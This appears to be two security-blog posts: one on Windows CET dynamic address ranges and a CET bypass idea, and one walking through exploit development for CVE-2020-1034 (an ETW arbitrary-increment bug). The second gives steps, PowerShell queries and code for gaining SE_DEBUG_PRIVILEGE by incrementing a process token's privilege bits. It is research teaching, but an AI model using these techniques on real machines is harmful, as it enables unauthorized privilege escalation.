CET Updates – Dynamic Address Ranges

In the last post I covered one new addition to CET – relaxed mode. But as we saw, there were a few other interesting additions. One of them is CetDynamicApisOutOfProcOnly, which is the one I will be covering in this post and which was also backported to 20H1 and 20H2.

But before I explain the flag, let’s talk about the mechanism that it mitigates.

Dynamic Enforced Address Ranges

As we know, Microsoft's implementation of hardware CET prevents a process from setting the instruction pointer to non-approved values through backward-edge ("return") flows, including through OS-provided mechanisms – whether by returning to an address that's different from the one on the shadow stack, setting the thread context, or unwinding to an unexpected address during exception handling. But as we've seen in the last two posts, there are cases that require special handling. One of those is dynamically generated (JIT) code.

Such code doesn’t always follow the rules and assumptions of CET, so Microsoft added a way to handle its needs, similar to the handling of Dynamic Exception Handler Continuation Targets, which I talked about in the first post. In this solution, a process can declare some ranges as “CET compatible” such that setting the instruction pointer to any address within that range won’t trigger a CET exception (#CP) that will crash the process.

To keep those ranges, the EPROCESS received a new field:

typedef struct _EPROCESS
{
    ...
    /* 0x0b18 */ struct _RTL_AVL_TREE DynamicEHContinuationTargetsTree;
    /* 0x0b20 */ struct _EX_PUSH_LOCK DynamicEHContinuationTargetsLock;
    /* 0x0b28 */ struct _PS_DYNAMIC_ENFORCED_ADDRESS_RANGES DynamicEnforcedCetCompatibleRanges;
    /* 0x0b38 */ unsigned long DisabledComponentFlags;
    ...
} EPROCESS, *PEPROCESS;

This new PS_DYNAMIC_ENFORCED_ADDRESS_RANGES structure contains an RTL_AVL_TREE and an EX_PUSH_LOCK. New ranges are inserted into the tree through a call to NtSetInformationProcess with the new information class ProcessDynamicEnforcedCetCompatibleRanges (0x66). The caller supplies a pointer to a PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION structure as the ProcessInformation argument, which contains the ranges to insert into the tree, or remove from it, depending on the Flags field:

typedef struct _PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE
{
    ULONG_PTR BaseAddress;
    SIZE_T Size;
    DWORD Flags;
} PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE, *PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE;

typedef struct _PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION
{
    WORD NumberOfRanges;
    WORD Reserved;
    DWORD Reserved2;
    PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE Ranges;
} PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION, *PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION;

The ranges are then read from the structure and inserted into the tree by the PspProcessDynamicEnforcedAddressRanges function. Of course, the process doesn't have to call NtSetInformationProcess directly, as there is a wrapper function for this in the Win32 API, exposed by KernelBase.dll – SetProcessDynamicEnforcedCetCompatibleRanges:

BOOL
SetProcessDynamicEnforcedCetCompatibleRanges (
    _In_ HANDLE ProcessHandle,
    _In_ WORD NumberOfRanges,
    _In_ PPROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE Ranges
    )
{
    NTSTATUS status;
    PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION dynamicEnforcedAddressRanges;
    dynamicEnforcedAddressRanges.NumberOfRanges = NumberOfRanges;
    dynamicEnforcedAddressRanges.Ranges = Ranges;
    status = NtSetInformationProcess(ProcessHandle,
                                     ProcessDynamicEnforcedCetCompatibleRanges,
                                     &dynamicEnforcedAddressRanges,
                                     sizeof(PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGES_INFORMATION));
    if (NT_SUCCESS(status))
    {
        return TRUE;
    }
    BaseSetLastNTError(status);
    return FALSE;
}
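
As a quick illustration, this is roughly how a JIT host would declare a freshly generated code region as CET compatible in a target process. This is a minimal sketch: hTargetProcess, jitBase and jitSize are placeholders, and the meaning of Flags is assumed from the description above:

// Minimal usage sketch -- hTargetProcess, jitBase and jitSize are placeholders.
PROCESS_DYNAMIC_ENFORCED_ADDRESS_RANGE range;
range.BaseAddress = (ULONG_PTR)jitBase;  // start of the dynamically generated code
range.Size = jitSize;                    // size of the region
range.Flags = 0;                         // assumption: 0 adds the range, a flag bit removes it

if (!SetProcessDynamicEnforcedCetCompatibleRanges(hTargetProcess, 1, &range))
{
    // With CetDynamicApisOutOfProcOnly set (covered below), this fails with
    // ERROR_ACCESS_DENIED when hTargetProcess refers to the calling process.
    printf("SetProcessDynamicEnforcedCetCompatibleRanges failed: %lu\n", GetLastError());
}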

This tree is used every time a CET fault happens – KiControlProtectionFaultShadow is invoked. It calls into KiControlProtectionFault, which calls KiProcessControlProtection. This function will look for the target address in the shadow stack and if it fails, will try the dynamic enforced CET compatible ranges through an exception handler.

First, the handler checks if strict CET is enabled on the system, to know whether it should check if the process has CET enabled (as a reminder, strict CET means that CET checks are performed on all processes, regardless of how they were compiled). If strict mode is not enabled, the function will check the image headers for the CETCOMPAT flag and will skip the ranges check if the flag is not set.

If it was determined that CET should be enforced for the image, the function calls RtlFindDynamicEnforcedAddressInRanges to check whether the target address is inside one of the dynamically enforced CET compatible address ranges. The function returns a BOOLEAN indicating whether a suitable range was found for the address. If a range was found, or if for some other reason the process should not be crashed (the process is not CET compatible, or audit mode is enabled), the function will then call KiFixupControlProtectionUserModeReturnMismatch to insert the target address into the shadow stack and allow the process to continue normal execution.

The Mitigation

Looking at all of this, an obvious flaw comes to mind: if a process can declare ranges that will be ignored by CET, all an exploit needs to do to bypass CET is add a useful range of the process memory to the tree, and then ROP its way around inside the approved range.

This is why the CetDynamicApisOutOfProcOnly flag was added – it only allows a process to add dynamic CET compatible ranges for remote processes, and not for itself. It does a very simple thing: inside NtSetInformationProcess, before calling PspProcessDynamicEnforcedAddressRanges, the function checks whether CetDynamicApisOutOfProcOnly is set for the process and whether the process is trying to add dynamic CET compatible ranges for itself. If so, the function returns STATUS_ACCESS_DENIED and the attempt fails.
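
A rough sketch of that check (the flag and field names here are approximations for illustration, not decompiled code):

// Approximate logic only -- flag and field names are assumptions.
if (Process->MitigationFlags2Values.CetDynamicApisOutOfProcOnly &&
    (Process == PsGetCurrentProcess()))
{
    return STATUS_ACCESS_DENIED;
}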

And actually in the newest builds of Windows, almost all Windows processes have this flag set by default. The only process that doesn’t appear to have it enabled is the Idle process (which doesn’t have a real EPROCESS structure, only a KPROCESS, so we’re effectively reading garbage memory).


Exploiting a “Simple” Vulnerability – In 35 Easy Steps or Less!

Introduction

In September MS issued a patch that fixed the CVE-2020-1034 vulnerability. This is a pretty cool and relatively simple vulnerability (increment by one), so I wanted to use it as a case study and look at a side of exploitation that isn’t talked about very often. Most public talks and blog posts related to vulnerabilities and exploits go into depth about the vulnerability itself, its discovery and research, and end with a PoC showing a successful “exploitation” – usually a BSOD with some kernel address being set to 0x41414141. This type of analysis is cute and splashy, but I wanted to look at the step after the crash – how to take a vulnerability and actually build a stable exploit around it, preferably one that isn’t detected easily?

This post will go into a bit more detail about the vulnerability itself, as when it’s been explained by others it was mainly with screenshots of assembly code, and data structures with magic numbers and uninitialized stack variables. Thanks to tools such as the public symbol files (PDB) from Microsoft, SDK header files, as well as Hex-rays Decompiler from IDA, a slightly easier to understand analysis can be made, revealing the actual underlying cause(s). Then, this post will focus on exploring the Windows mechanisms involved in the vulnerability and how they can be used to create a stable exploit that results in local privilege escalation without crashing the machine (which is what a naïve exploitation of this vulnerability will eventually result in, for reasons I’ll explain).

 

The Vulnerability

In short, CVE-2020-1034 is an input validation bug in EtwpNotifyGuid that allows an increment of an arbitrary address. The function doesn’t account for all possible values of a specific input parameter (ReplyRequested) and for values other than 0 and 1 will treat an address inside the input buffer as an object pointer and try to reference it, which will result in an increment at ObjectAddress - offsetof(OBJECT_HEADER, Body). The root cause is essentially a check that applies the BOOLEAN logic of “!= FALSE” in one case, while then using “== TRUE” in another. A value such as 2 incorrectly fails the second check, but still hits the first.

NtTraceControl receives an input buffer as its second parameter. In the case leading to this vulnerability, the buffer will begin with a structure of type ETWP_NOTIFICATION_HEADER. This input parameter is passed into EtwpNotifyGuid, where the following check happens:

If NotificationHeader->ReplyRequested is 1, the ReplyObject field of the structure will be populated with a new UmReplyObject. A little further down the function, the notification header, or actually a kernel copy of it, is passed to EtwpSendDataBlock and from there to EtwpQueueNotification, where we find the bug:

If NotificationHeader->ReplyRequested is not 0, ObReferenceObject is called, which is going to grab the OBJECT_HEADER that is found right before the object body and increment PointerCount by 1. Now we can see the problem – ReplyRequested is not a single bit that can only be 0 or 1. It's a BOOLEAN, meaning it can be any value from 0 to 0xFF. Any non-zero value other than 1 will leave the ReplyObject field untouched, but will still call ObReferenceObject with whichever address the (user-mode) caller supplied in this field, leading to an increment of an arbitrary address. Since PointerCount is the first field in OBJECT_HEADER, the address that will be incremented is NotificationHeader->ReplyObject - offsetof(OBJECT_HEADER, Body).
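
To make the mismatch concrete, here's a simplified sketch of the two checks described above (not the actual decompiled functions):

// In EtwpNotifyGuid: only the exact value 1 gets a real reply object.
if (notificationHeader->ReplyRequested == TRUE)     // i.e. == 1
{
    notificationHeader->ReplyObject = newUmReplyObject;
}

// Later, in EtwpQueueNotification: any non-zero value is treated as
// "a reply object is present".
if (notificationHeader->ReplyRequested != FALSE)    // i.e. != 0
{
    // For ReplyRequested values 2-0xFF, ReplyObject still holds the caller's
    // arbitrary pointer, so the increment lands at
    // ReplyObject - offsetof(OBJECT_HEADER, Body).
    ObReferenceObject(notificationHeader->ReplyObject);
}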

The fix for this bug is probably obvious to anyone reading this, and involves a very simple change in EtwpNotifyGuid:

if (notificationHeader->ReplyRequested != FALSE)
{
    status = EtwpCreateUmReplyObject((ULONG_PTR)etwGuidEntry,
                                     &Handle,
                                     &replyObject);
    if (NT_SUCCESS(status))
    {
        notificationHeader->ReplyObject = replyObject;
        goto allocateDataBlock;
    }
}
else
{
    ...
}

Any non-zero value in ReplyRequested will lead to allocating a new reply object that will overwrite the value passed in by the caller.

On the surface this bug sounds very easy to exploit. But in reality, not so much. Especially if we want to make our exploit evasive and hard to detect. So, let’s begin our journey by looking at how this vulnerability is triggered and then try to exploit it.

How to Trigger

This vulnerability is triggered through NtTraceControl, which has this signature:

NTSTATUS
NTAPI
NtTraceControl (
    _In_ ULONG Operation,
    _In_ PVOID InputBuffer,
    _In_ ULONG InputSize,
    _In_ PVOID OutputBuffer,
    _In_ ULONG OutputSize,
    _Out_ PULONG BytesReturned
);

If we look at the code inside NtTraceControl we can learn a few things about the arguments we need to send to trigger the vulnerability:

The function has a switch statement for handling the Operation parameter – to reach EtwpNotifyGuid we need to use EtwSendDataBlock (17). We also see some requirements about the sizes we need to pass in, and we can notice that the NotificationType we use should not be EtwNotificationTypeEnable, as that would lead us to EtwpEnableGuid instead. There are a few more restrictions on the NotificationType field, but we'll see those soon.

It's worth noting that this code path is called by the Win32 exported function EtwSendNotification, which Geoff Chappell documented on his blog. His page on Notify GUIDs is also valuable, and corroborates the parameter checks shown above.

Let’s look at the ETWP_NOTIFICATION_HEADER structure to see what other fields we need to consider here:

typedef struct _ETWP_NOTIFICATION_HEADER
{
    ETW_NOTIFICATION_TYPE NotificationType;
    ULONG NotificationSize;
    LONG RefCount;
    BOOLEAN ReplyRequested;
    union
    {
        ULONG ReplyIndex;
        ULONG Timeout;
    };
    union
    {
        ULONG ReplyCount;
        ULONG NotifyeeCount;
    };
    union
    {
        ULONGLONG ReplyHandle;
        PVOID ReplyObject;
        ULONG RegIndex;
    };
    ULONG TargetPID;
    ULONG SourcePID;
    GUID DestinationGuid;
    GUID SourceGuid;
} ETWP_NOTIFICATION_HEADER, *PETWP_NOTIFICATION_HEADER;

Some of these fields we've seen already and others we haven't, and some of them don't matter much for the purpose of our exploit. We'll begin with the field that required the most work – DestinationGuid:

Finding the Right GUID

ETW is based on providers and consumers, where the providers notify about certain events and the consumers can choose to be notified by one or more providers. Each of the providers and consumers in the system is identified by a GUID.

Our vulnerability is in the ETW notification mechanism (which used to be part of WMI, but is now all part of ETW). When sending a notification, we are actually notifying a specific GUID, so we need to be careful to pick one that will work.

The first requirement is picking a GUID that actually exists on the system:

One of the first things that happens in EtwpNotifyGuid is a call to EtwpFindGuidEntryByGuid, with the DestinationGuid passed in, followed by an access check on the returned ETW_GUID_ENTRY.

What GUIDs are Registered?

To find a GUID that will successfully pass this code we should first go over a bit of ETW internals. The kernel has a global variable named PspHostSiloGlobals, which is a pointer to an ESERVERSILO_GLOBALS structure. This structure contains an EtwSiloState field, which is an ETW_SILODRIVERSTATE structure. This structure has lots of interesting information that is needed for ETW management, but the one field we need for our research is EtwpGuidHashTable. This is an array of 64 ETW_HASH_BUCKETS structures. To find the right bucket for a GUID, it is hashed this way: (Guid->Data1 ^ (Guid->Data2 ^ Guid->Data4[0] ^ Guid->Data4[4])) & 0x3F. This scheme was probably implemented as a performant way to find the kernel structures for GUIDs, since hashing the GUID is faster than iterating a list.
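
In code, the bucket lookup described above boils down to this (a sketch based on the hash formula given here):

// Bucket index into EtwpGuidHashTable, using the hash described above.
ULONG
EtwGuidHashBucket (
    _In_ const GUID* Guid
    )
{
    return (Guid->Data1 ^ (Guid->Data2 ^ Guid->Data4[0] ^ Guid->Data4[4])) & 0x3F;
}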

Each bucket contains a lock and 3 linked lists, corresponding to the 3 values of ETW_GUID_TYPE:

These lists contain structures of type ETW_GUID_ENTRY, which have all the needed information for each registered GUID:

As we can see in the screenshot earlier, EtwpNotifyGuid passes EtwNotificationGuid type as the ETW_GUID_TYPE (unless NotificationType is EtwNotificationTypePrivateLogger, but we will see later that we should not be using that). We can start by using some WinDbg magic to print all the ETW providers registered on my system under EtwNotificationGuidType and see which ones we can choose from:

When EtwpFindGuidEntryByGuid is called, it receives a pointer to the ETW_SILODRIVERSTATE, the GUID to search for and the ETW_GUID_TYPE that this GUID should belong to, and returns the ETW_GUID_ENTRY for this GUID. If a GUID is not found, it will return NULL and EtwpNotifyGuid will exit with STATUS_WMI_GUID_NOT_FOUND.

dx -r0 @$etwNotificationGuid = 1
dx -r0 @$GuidTable = ((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpGuidHashTable
dx -g @$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid]).Where(list => list.Flink != &list).Select(list => (nt!_ETW_GUID_ENTRY*)(list.Flink)).Select(Entry => new { Guid = Entry->Guid, Refs = Entry->RefCount, SD = Entry->SecurityDescriptor, Reg = (nt!_ETW_REG_ENTRY*)Entry->RegListHead.Flink})

Only one active GUID is registered on my system! This GUID could be interesting to use for our exploit, but before we do, we should look at a few more details related to it.

In the diagram earlier we can see the RegListHead field inside the ETW_GUID_ENTRY. This is a linked list of ETW_REG_ENTRY structures, each describing a registered instance of the provider, since the same provider can be registered multiple times, by the same process or different ones. We’ll grab the “hash” of this GUID (25) and print some information from its RegList:

dx -r0 @$guidEntry = (nt!_ETW_GUID_ENTRY*)(@$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid])[25].Flink)
dx -g Debugger.Utility.Collections.FromListEntry(@$guidEntry->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Select(r => new {Caller = r.Caller, SessionId = r.SessionId, Process = r.Process, ProcessName = ((char[15])r.Process->ImageFileName)->ToDisplayString("s"), Callback = r.Callback, CallbackContext = r.CallbackContext})

There are 6 instances of this GUID being registered on this system by 6 different processes. This is cool but could make our exploit unstable – when a GUID is notified, all of its registered entries get notified and might try to handle the request. This causes two complications:

  1. We can’t predict accurately how many increments our exploit will cause for the target address, since we could get one increment for each registered instance (but not guaranteed to – this will be explained soon).
  2. Each of the processes that registered this provider could try to use our fake notification in a different way that we didn’t plan for. They could try to use the fake event, or read some data that isn’t formatted properly, and cause a crash. For example, if the notification has NotificationType = EtwNotificationTypeAudio, Audiodg.exe will try to process the message, which will make the kernel free the ReplyObject. Since the ReplyObject is not an actual object, this causes an immediate crash of the system. I didn’t test different cases, but it’s probably safe to assume that even with a different NotificationType this will still crash eventually as some registered process tries to handle the notification as a real one.

Since the goal we started with was creating a stable and reliable exploit that doesn’t randomly crash the system, it seems that this GUID is not the right one for us. But this is the only registered provider in the system, so what else are we supposed to use?

A Custom GUID

We can register our own provider! This way we are guaranteed that no one else is going to use it and we have full control over it. EtwNotificationRegister allows us to register a new provider with a GUID of our choice.

And again, I’ll save you the trouble of trying this out for yourself and tell you in advance that this just doesn’t work. But why?

Like everything on Windows, an ETW_GUID_ENTRY has a security descriptor, describing which actions different users and groups are allowed to perform on it. And as we saw in the screenshot earlier, before notifying a GUID, EtwpNotifyGuid calls EtwpAccessCheck to check whether the GUID grants WMIGUID_NOTIFICATION access to the user that is trying to notify it.

To test this, I registered a new provider, which we can see when we dump the registered providers the same way we did earlier:

And use the !sd command to print its security descriptor nicely (this is not the full list, but I trimmed it down to the relevant part):

A security descriptor contains, among other things, a DACL – a list of ACEs, each pairing a group or user (represented by a SID, in the form of "S-1-...") with an ACCESS_MASK describing the actions that group is allowed to perform on the object. Since we are running as a normal user with medium integrity level, we are usually pretty limited in what we can do. The main groups that our process is included in are Everyone (S-1-1-0) and Users (S-1-5-32-545). As we can see here, the default security descriptor for an ETW_GUID_ENTRY doesn't contain any specific access mask for Users, and the access mask for Everyone is 0x1800 (TRACELOG_JOIN_GROUP | TRACELOG_REGISTER_GUIDS). Higher access masks are reserved for more privileged groups, such as Local System and Administrators. Since our user doesn't have WMIGUID_NOTIFICATION access to this GUID, we will receive STATUS_ACCESS_DENIED when trying to notify it and our exploit will fail.
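
For reference, here's how the relevant access-right bits decompose (the names are the ones discussed in this post; the values follow from the masks above and below):

#define WMIGUID_NOTIFICATION     0x0004  // needed to notify a GUID
#define TRACELOG_REGISTER_GUIDS  0x0800  // needed to register a provider
#define TRACELOG_JOIN_GROUP      0x1000

// Everyone's default mask: 0x1800 = TRACELOG_JOIN_GROUP | TRACELOG_REGISTER_GUIDS
// What the exploit needs:  0x0804 = TRACELOG_REGISTER_GUIDS | WMIGUID_NOTIFICATION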

That is, unless you are running it on a machine that has Visual Studio installed. Then the default Security Descriptor changes and Performance Log Users (which are basically any logged in user) receive all sorts of interesting privileges, including the two we care about. But let’s pretend that your exploit is not running on a machine that has one of the most popular Windows tools installed on it and focus on clean Windows machines without weird permission bugs.

Well, not all GUIDs use the default security descriptor. It is possible to change the access rights for a GUID, through the registry key HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Security:

This key contains all the GUIDs in the system using non-default security descriptors. The data is the security descriptor for the GUID, but since it is shown here as a REG_BINARY it is a bit difficult to parse this way.

Ideally, we would just add our new GUID here with a more permissive security descriptor and go on to trigger the exploit. Unfortunately, letting any user change the security descriptor of a GUID would break the Windows security model, so access to this registry key is reserved for SYSTEM, Administrators and EventLog:

If our default security descriptor is not strong enough and we can’t change it without a more privileged process, it looks like we can’t actually achieve much using our own GUID.

Living Off the Land

Luckily, using the one registered GUID on the system and registering our own GUID are not the only available choices. There are a lot of other GUIDs in that registry key that already have modified permissions. At least one of them must allow WMIGUID_NOTIFICATION for a non-privileged user.

Here we face another issue – actually, in this case WMIGUID_NOTIFICATION is not enough. Since none of these GUIDs is a registered provider yet, we will first need to register them before being able to use them for our exploit. When registering a provider through EtwNotificationRegister, the request goes through NtTraceControl and reaches EtwpRegisterUMGuid, where this check is done:

To be able to use an existing GUID, we need it to allow both WMIGUID_NOTIFICATION and TRACELOG_REGISTER_GUIDS for a normal user. To find one we'll use the magic of PowerShell, which manages to have such an ugly syntax that it almost made me give up and write a registry parser in C instead (and yes, the -band below really is a bitwise AND. This is what it is. I'm sorry). We'll iterate over all the GUIDs in the registry key, check the security descriptor for Everyone (S-1-1-0), and print the GUIDs that allow at least one of the permissions we need (0x804 = WMIGUID_NOTIFICATION | TRACELOG_REGISTER_GUIDS):

$RegPath = "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Security"
foreach($line in (Get-Item $RegPath).Property) { $mask = (New-Object System.Security.AccessControl.RawSecurityDescriptor ((Get-ItemProperty $RegPath | select -Expand $line), 0)).DiscretionaryAcl | where SecurityIdentifier -eq S-1-1-0 | select AccessMask; if ($mask -and [Int64]($mask.AccessMask) -band 0x804) { $line; $mask.AccessMask.ToString("X")}}

Not much luck here. Other than the GUID we already know about, nothing grants both of the permissions we need to Everyone.

But I’m not giving up yet! Let’s try the script again, this time checking the permissions for Users (S-1-5-32-545):

foreach($line in Get-Content C:\Users\yshafir\Desktop\guids.txt) { $mask = (New-Object System.Security.AccessControl.RawSecurityDescriptor ((Get-ItemProperty $RegPath | select -Expand $line), 0)).DiscretionaryAcl | where SecurityIdentifier -eq S-1-5-32-545 | select AccessMask; if ($mask -and [Int64]($mask.AccessMask) -band 0x804) { $line; $mask.AccessMask.ToString("X")}}

Now this is much better! There are multiple GUIDs allowing both the things we need; we can choose any of them and finally write an exploit!

For my exploit I chose to use the second GUID in the screenshot – {4838fe4f-f71c-4e51-9ecc-8430a7ac4c6c} – belonging to "Kernel Idle State Change Event". This was a pretty random choice and any of the other ones that enable both needed rights should work the same way.

What Do We Increment?

Now starts the easy part – we register our shiny new GUID, choose an address to increment, and trigger the exploit. But what address do we want to increment?

The easiest choice for privilege escalation is the token privileges:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->Privileges
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->Privileges                 [Type: _SEP_TOKEN_PRIVILEGES]    
[+0x000] Present          : 0x602880000 [Type: unsigned __int64]    
[+0x008] Enabled          : 0x800000 [Type: unsigned __int64]    
[+0x010] EnabledByDefault : 0x40800000 [Type: unsigned __int64]

When checking if a process or a thread can do a certain action in the system, the kernel checks the token privileges – both the Present and Enabled bits. That makes privilege escalation relatively easy in our case: if we want to give our process a certain useful privilege – for example SE_DEBUG_PRIVILEGE, which allows us to open a handle to any process in the system – we just need to increment the privileges of the process token until they contain the privilege we want to have.

There are a few simple steps to achieve that:

  1. Open a handle to the process token.
  2. Get the address of the token object in the kernel – use NtQuerySystemInformation with the SystemHandleInformation class to receive all the handles in the system and iterate over them until we find the one matching our token, then save its Object address (a minimal sketch of this step follows the list).
  3. Calculate the address of Privileges.Present and Privileges.Enabled based on the offsets inside the token.
  4. Register a new provider with the GUID we found.
  5. Build the malicious ETWP_NOTIFICATION_HEADER structure and call NtTraceControl the correct number of times (0x100000 for SE_DEBUG_PRIVILEGE) to increment Privileges.Present, and again to increment Privileges.Enabled.
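
Step 2 is the only one that needs some non-obvious plumbing, so here's a minimal sketch of it (this is illustrative code, not the actual exploit source; the SYSTEM_HANDLE_INFORMATION structures are declared by hand since they're not in the SDK headers, and error handling is kept short):

#include <windows.h>
#include <winternl.h>
#include <stdlib.h>
#pragma comment(lib, "ntdll.lib")

#define SystemHandleInformation ((SYSTEM_INFORMATION_CLASS)16)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

PVOID
FindTokenObjectAddress (
    _In_ HANDLE TokenHandle
    )
{
    NTSTATUS status;
    ULONG size = 0x10000;
    PSYSTEM_HANDLE_INFORMATION handleInfo;
    PVOID tokenObject = NULL;

    //
    // Grow the buffer until the system-wide handle snapshot fits
    //
    for (;;)
    {
        handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(size);
        if (handleInfo == NULL)
        {
            return NULL;
        }
        status = NtQuerySystemInformation(SystemHandleInformation,
                                          handleInfo,
                                          size,
                                          NULL);
        if (status != STATUS_INFO_LENGTH_MISMATCH)
        {
            break;
        }
        free(handleInfo);
        size *= 2;
    }

    //
    // Find the entry that belongs to our process and matches our token handle,
    // then grab the kernel address of the token object
    //
    if (NT_SUCCESS(status))
    {
        for (ULONG i = 0; i < handleInfo->NumberOfHandles; i++)
        {
            if ((handleInfo->Handles[i].UniqueProcessId == (USHORT)GetCurrentProcessId()) &&
                (handleInfo->Handles[i].HandleValue == (USHORT)(ULONG_PTR)TokenHandle))
            {
                tokenObject = handleInfo->Handles[i].Object;
                break;
            }
        }
    }
    free(handleInfo);
    return tokenObject;
}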

Like a lot of things, this sounds great until you actually try it. In reality, when you try this you will see that your privileges don't get incremented by 0x100000. In fact, the Present privileges only get incremented by 4 and Enabled stays untouched. To understand why, we need to go back to ETW internals…

Slots and Limits

Earlier we saw how the GUID entry is represented in the kernel and that each GUID can have multiple ETW_REG_ENTRY structures registered to it, representing each registration instance. When a GUID gets notified, the notification gets queued for all of its registration instances (since we want all processes to receive a notification). For that, the ETW_REG_ENTRY has a ReplyQueue, containing 4 ReplySlot entries. Each of these points to an ETW_QUEUE_ENTRY structure, which contains the information needed to handle the request – the data block provided by the notifier, the reply object, flags, etc:

This is not relevant for this exploit, but the ETW_QUEUE_ENTRY also contains a linked list of all the queued notifications waiting for this process, from all GUIDs. Just mentioning it here because this could be a cool way to reach different GUIDs and processes and worth exploring 🙂

Since every ETW_REG_ENTRY only has 4 reply slots, it can only have 4 notifications waiting for a reply at any time. Any notification that arrives while the 4 slots are full will not be handled – EtwpQueueNotification will reference the “object” supplied in ReplyObject, only to immediately dereference it when it sees that the reply slots are full:

Usually this is not an issue since notifications get handled pretty quickly by the consumer waiting for them and get removed from the queue almost immediately. However, this is not the case for our notifications – we are using a GUID that no one else is using, so no one is waiting for these notifications. On top of that, we are sending “corrupted” notifications, which have the ReplyRequested field set to non-zero, but don’t have a valid ETW registration object set as their ReplyObject (since we are using an arbitrary pointer that we want to increment). Even if we reply to the notifications ourselves, the kernel will try to treat our ReplyObject as a valid ETW registration object, and that will most likely crash the system one way or another.

Sounds like we are blocked here — we can’t reply to our notifications and no one else will either, and that means we have no way to free the slots in the ETW_REG_ENTRY and are limited to 4 notifications. Since freeing the slots will probably result in crashing the system, it also means that our process can’t exit once it triggers the vulnerability – when a process exits all of its handles get closed and that will lead to freeing all the queued notifications.

Keeping our process alive is not much of an issue, but what can we do with only 4 increments?

The answer is, we don’t really need to limit ourselves to 4 increments and can actually use just one – if we use our knowledge of how ETW works.

Provider Registration to the Rescue

Now we know that every registered provider can only have up to 4 notifications waiting for a reply. The good news is that there is nothing stopping us from registering more than one provider, even for the same GUID. And since every notification gets queued for all registered instances for the GUID, we don’t even need to notify each instance separately – we can register X providers and only send one notification, and receive X increments for our target address! Or we can send 4 notifications and get 4X increments (for the same target address, or up to 4 different ones):

Knowing that, can we register 0x100000 providers, then notify them once with a “bad” ETW notification and get SE_DEBUG_PRIVILEGE in our token and finally have an exploit?

Not exactly.

When registering a provider using EtwNotificationRegister, the function first needs to allocate and initialize an internal registration data structure that will be sent to NtTraceControl to register the provider. This data structure is allocated with EtwpAllocateRegistration, where we see the following check:

Ntdll only allows the process to register up to 0x800 providers. If the current number of registered providers for the process is 0x800, the function will return and the operation will fail.

Of course, we can try to bypass this by figuring out the internal structures, allocating them ourselves and calling NtTraceControl directly. However, I wouldn't recommend it – this is complicated work and might cause unexpected side effects when ntdll tries to handle a reply for providers that it doesn't know about.

Instead, we can do something much simpler: we want to increment our privileges by 0x100000. But if we look at the privileges as separate bytes and not as a DWORD, we’ll see that actually, we only want to increment the 3rd byte by 0x10:

To make our exploit simpler and only require 0x10 increments, we will just add 2 bytes to our target addresses for both Privileges.Present and Privileges.Enabled. We can further minimize the amount of calls we need to make to NtTraceControl if we register 0x10 providers using the GUID we found, then send one notification with the address of Privileges.Present as a target, and another one with the address of Privileges.Enabled.
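
As a quick sanity check of that arithmetic (SE_DEBUG_PRIVILEGE is LUID 20, so the bit we want is 1 << 20):

// 1 << 20 == 0x100000. Bytes 0-1 of the 64-bit bitmap cover bits 0-15,
// so byte 2 covers bits 16-23, where our bit is worth 0x10.
ULONGLONG debugPrivilegeMask = 1ULL << 20;                  // 0x0000000000100000
UCHAR incrementsNeeded = (UCHAR)(debugPrivilegeMask >> 16); // 0x10 increments of byte 2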

Now we only have one thing left to do before writing our exploit – building our malicious notification.

Notification Header Fields

ReplyRequested

As we’ve seen in the beginning of this post (so to anyone who made it this far, probably 34 days ago), the vulnerability is triggered through a call to NtTraceControl with an ETWP_NOTIFICATION_HEADER structure where ReplyRequested is a value other than 0 and 1. For this exploit I’ll use 2, but any other value between 2 and 0xFF will work.

NotificationType

Then we need to pick a notification type out of the ETW_NOTIFICATION_TYPE enum:

typedef enum _ETW_NOTIFICATION_TYPE
{
    EtwNotificationTypeNoReply = 1,
    EtwNotificationTypeLegacyEnable = 2,
    EtwNotificationTypeEnable = 3,
    EtwNotificationTypePrivateLogger = 4,
    EtwNotificationTypePerflib = 5,
    EtwNotificationTypeAudio = 6,
    EtwNotificationTypeSession = 7,
    EtwNotificationTypeReserved = 8,
    EtwNotificationTypeCredentialUI = 9,
    EtwNotificationTypeMax = 10,
} ETW_NOTIFICATION_TYPE;

We’ve seen earlier that our chosen type should not be EtwNotificationTypeEnable, since that will lead to a different code path that will not trigger our vulnerability.

We also shouldn't use EtwNotificationTypePrivateLogger or EtwNotificationTypeFilteredPrivateLogger. Using these types changes the destination GUID to PrivateLoggerNotificationGuid and requires the TRACELOG_GUID_ENABLE access right, which is not available to normal users. Other types, such as EtwNotificationTypeSession and EtwNotificationTypePerflib, are used across the system and could lead to unexpected results if some system component tries to handle our notification as belonging to a known type, so we should probably avoid those too.

